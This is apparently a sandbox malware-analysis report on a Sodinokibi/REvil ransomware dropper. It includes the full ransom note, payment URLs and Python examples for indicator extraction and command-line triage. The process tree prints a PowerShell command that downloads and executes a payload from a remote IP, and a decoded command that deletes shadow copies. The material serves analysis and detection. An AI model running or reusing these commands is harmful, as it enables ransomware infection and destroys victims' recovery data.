Analysis

  • max time kernel
    143s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7v200410
  • submitted
    22-04-2020 18:10

General

  • Target

    bRDkHdRf.bat

  • Size

    189B

  • MD5

    b0fdd8126abe00e3607bc60b33cfd211

  • SHA1

    22fe9dfc70b79b53d6a958d30c42dd7640554e8d

  • SHA256

    8508a74435256a2c8472db03d6c09f8ac0d60ded076803d1dc9e5bec75b162ac

  • SHA512

    cc6eab2d339081bce0d73366bda16a138f53f6ee31b0d39a23ffbe4dfb68511a8d0917092296706b8d9fba32d0aa0efea2d9c89b88baaa5f2b36fe426302514d

Malware Config

Extracted

  • Language
    ps1
  • Source
    ps1.dropper
  • URLs
    http://185.103.242.78/pastes/bRDkHdRf

Extracted

  • Path
    C:\ivx701a929-readme.txt
  • Family
    sodinokibi
  • Ransom Note
---=== Welcome. OSTEAD. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ivx701a929. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FB14B9B4438547FC 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/FB14B9B4438547FC Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: R0hPrLslpFUUNBjfeCGcwHMlWqoHwFDYEoyctNwVIC3MkuKbluribspacY+AtUpW HXNtiTkBKCIJtZZ2E0b9CVe5UuWKgXqPERTfExZYheqRUry+pL//nN8bGdpsjkRx oYwo4wyZhwsevS4LIc2C5kboncsIhViyWLCFyGZg7x1kXn/bn2OlOmaGchePbcaY 5AS268A6SNr8aEQYOwbjYolRnfDyPXmGAeyeWLbnoJYpb4JRwAhh0iv8JmusWN2z I8cZN0UDe/PG7IGL6PowOY0hhFCrXLiW0y/C7UgZ7rdbcZo1mJP2uQu9EthRLDRF 9BdVq6KSgEQV9LjLXr9oWA59ZOUqguO1c5snQzTLBK4nrYh/XBuMMIWM8W3+amIj ZSbbtgsuSZIyc50koc4y21/KnLYpitTi3/X40ekX0k3GA+ESYNBhRYEbh5vymR1H wQD0IbKpSZEEci3oltQxLflqvMSHwKBP35M9nhw/axaH7ATpWwbLA2keOtwSq9yR /vt8ItmlcTt9xikbrBSMxDRwjtncM+ecZu6AG9qhbsafn7DpbJPgKOWHHxjTMj32 DmkT6TLitNhwnPjODhpjgw6B62YZlB35TFi94GIURf1EvkB2hwsfggHDKw4u8K9m htm8dnzCRiv+LnoIFYaJtlVcltXzHSOalzgtnjx9UY9tqdunYCmJem9WDiz4va8h ry3LR+bNIUSyE+mKNNcmuZEyr6Lhcsws7qORzpqr/nzjCDoFJfC05SnzpihKURs/ BHyjGaapQiCrxekTq+C26oKcbIXMsnLiz85ewqqq0PTq9T9cnyJW869toX+aGT2Y klIAtJ8dhoAF6f55em+QwmxQJZW3+kVsIgcECvGIsOGIuPY1/2GEBttyCILBnnFN cMOLE7bc/FBZ63lP6TZ3DR5ZmqSWom4e/c+hQqgnbY31D28m0SqdHCx3r/rxV4Wf aM4fE/JT4OfqkemkrZoSx2Ohl9LjVa6G+w4XTspQhEFLHZzk8oyHGbQgN/Dpk5Co pWc+BQBcDVvBFiyb9oCqWNtFk8SNTokRZHBskgoyFsLgC8pOWysCOcDGFuq5jxI2 8LcAhC645DlnFg7aXcFQmRE2YFOia2Mv4/8u4YYBkuj+BFQAWo3CUOa7+ajbh0Iy fX2pFG0f519HzcKfbpRZjv8UUR3DYZYEEVvfbBPNCTyYADeEcxAosAwaSUIh0H9F /qnpdG2L7vlryWC3WT5WeN5fWRQGVRQo2/QL0owN5LuFq3EgGNnbmUJkftQ2tFHe x7LheHdyMTgB69RKCPG59m72jUbiwl3iaV72FkK49CBK9coHHz/hFQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
  • URLs
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FB14B9B4438547FC
    http://decryptor.cc/FB14B9B4438547FC
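The Path, Family and URLs fields above are the kind of thing a config extractor pulls from the dropped note. The following is an added example, not code from the sandbox or from any published extractor: it runs a few regular expressions over an excerpt of the ransom note quoted above (the base64 key blob is cut to its first line, and elided passages are marked with "..."), recovers the appended extension, the victim ID, the .onion and clearnet payment URLs, and checks that both URLs carry the same victim ID. Field names and the `NOTE` excerpt are this example's own.

```python
"""Extract indicators from a Sodinokibi/REvil ransom note (added example)."""
import re

# Excerpt of the note dropped as C:\ivx701a929-readme.txt (quoted in the
# report above). "..." marks text left out of this excerpt; the key is
# shortened to its first line.
NOTE = (
    "---=== Welcome. OSTEAD. ===--- [+] Whats Happen? [+] Your files are encrypted, "
    "and currently unavailable. You can check it: all files on your system has "
    "extension ivx701a929. ... "
    "a) Download and install TOR browser from this site: https://torproject.org/ "
    "b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FB14B9B4438547FC "
    "... b) Open our secondary website: http://decryptor.cc/FB14B9B4438547FC "
    "... put the following data in the input form: "
    "Key: R0hPrLslpFUUNBjfeCGcwHMlWqoHwFDYEoyctNwVIC3MkuKbluribspacY+AtUpW ... "
    "----------- !!! DANGER !!! DONT try to change files by yourself"
)

# Hosts that appear in the note but are not attacker infrastructure.
BENIGN_HOSTS = {"torproject.org", "www.torproject.org"}

URL_RX = re.compile(r"https?://[^\s\"'<>]+")
EXT_RX = re.compile(r"(?i)extension\s+([A-Za-z0-9]{4,16})\b")
ONION_ID_RX = re.compile(r"\.onion/([A-Za-z0-9]+)")
# One or more base64 chunks following "Key:"; stops at the first token
# that is not base64 (the "-----" rule in the real note, "..." here).
KEY_RX = re.compile(r"Key:\s*((?:[A-Za-z0-9+/]{4,}={0,2}\s*)+)")


def extract_urls(note):
    """Return all URLs in the note except those on known benign hosts."""
    found = []
    for m in URL_RX.finditer(note):
        url = m.group(0).rstrip(".,;:)")
        host = re.sub(r"^https?://", "", url).split("/")[0].lower()
        if host not in BENIGN_HOSTS:
            found.append(url)
    return found


def extract_config(note):
    """Recover extension, victim ID, payment URLs and key from a REvil note."""
    urls = extract_urls(note)
    onion = [u for u in urls if ".onion" in u]
    clearnet = [u for u in urls if ".onion" not in u]

    ext = EXT_RX.search(note)
    key = KEY_RX.search(note)

    # The victim ID is the path component of the .onion URL; the clearnet
    # mirror should carry the same ID, which is a useful sanity check.
    victim_ids = {m.group(1) for u in onion for m in ONION_ID_RX.finditer(u)}
    victim_id = next(iter(victim_ids)) if len(victim_ids) == 1 else None
    mirror_consistent = bool(victim_id) and all(
        u.rstrip("/").endswith("/" + victim_id) for u in clearnet
    )

    return {
        "extension": ext.group(1) if ext else None,
        "expected_note_name": f"{ext.group(1)}-readme.txt" if ext else None,
        "victim_id": victim_id,
        "onion_urls": onion,
        "clearnet_urls": clearnet,
        "key": re.sub(r"\s+", "", key.group(1)) if key else None,
        "mirror_consistent": mirror_consistent,
    }


if __name__ == "__main__":
    for k, v in extract_config(NOTE).items():
        print(f"{k}: {v}")
```

The extension-to-filename rule (`<ext>-readme.txt`) is what the report's Path field shows; treat it as a convention observed in this family rather than a guarantee, since the note name is attacker-controlled.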

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 56 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Makes http(s) request 17 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs
  • Drops file in Program Files directory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\bRDkHdRf.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bRDkHdRf');Invoke-JUCJCK;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      • Modifies system certificate store
      • Drops file in Program Files directory
      PID:1036
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        (the -e argument is base64 of UTF-16LE text and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. deletion of all Volume Shadow Copies before encryption; this is why vssvc.exe appears in the tree)
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1508
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1728
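The process tree above is the whole infection chain: a .bat launches PowerShell, PowerShell fetches and IEX-es a script from the paste host, and a child PowerShell runs an encoded command that deletes shadow copies. The block below is an added example, not part of the sandbox report: it takes the three command lines from the tree as input, decodes the `-e`/`-EncodedCommand` payload the way PowerShell does (base64 of UTF-16LE), and flags the behaviours a detection rule would key on (download cradle, IEX, shadow-copy deletion, a long sleep to keep the parent alive). Function names and the indicator list are this example's own.

```python
"""Decode and triage PowerShell command lines from a process tree (added example)."""
import base64
import re

# Command lines copied from the Processes section above (PIDs 2024, 1036, 1508).
PROCESS_TREE = [
    (2024, r'cmd /c "C:\Users\Admin\AppData\Local\Temp\bRDkHdRf.bat"'),
    (1036, r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bRDkHdRf');Invoke-JUCJCK;Start-Sleep -s 10000"'''),
    (1508, "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=="),
]

# PowerShell accepts -e, -ec and any unambiguous prefix of -EncodedCommand.
# Capture "-e<letters>" and check the prefix in code so -ep (ExecutionPolicy)
# is not mistaken for it.
FLAG_RX = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)")

INDICATORS = [
    ("download_cradle", re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient")),
    ("iex", re.compile(r"(?i)\bIEX\b|Invoke-Expression")),
    ("shadow_copy_delete", re.compile(r"(?i)Win32_Shadowcopy.*Delete|vssadmin.*delete\s+shadows|wmic.*shadowcopy\s+delete")),
    ("long_sleep", re.compile(r"(?i)Start-Sleep\s+-s(?:econds)?\s+\d{4,}")),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or invalid."""
    for m in FLAG_RX.finditer(cmdline):
        flag = m.group(1).lower()
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue
        try:
            return base64.b64decode(m.group(2), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def triage(pid, cmdline):
    """Decode any encoded payload and match indicators over raw + decoded text."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + " " + decoded
    hits = [name for name, rx in INDICATORS if rx.search(text)]
    return {"pid": pid, "decoded": decoded, "indicators": hits}


def triage_tree(tree):
    return [triage(pid, cmdline) for pid, cmdline in tree]


if __name__ == "__main__":
    for result in triage_tree(PROCESS_TREE):
        print(result)
```

Matching on the decoded text is the point: an EDR rule that only inspects the raw command line sees an opaque base64 blob for PID 1508 and misses the `Win32_Shadowcopy ... Delete()` call entirely.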

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_05471756-4b9c-45e9-8ddd-05fab605d637

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_20b90e15-f237-499e-a823-6772568bf000

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_37386d62-281a-4a91-a575-6755e45f3238

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5028523d-10aa-4674-b3d1-9db9e7b9fbf6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a24b3c29-8785-47a4-90c7-9951cb5bf055

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b3feaac6-0199-4ad4-87ff-a4b7cbd02223

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms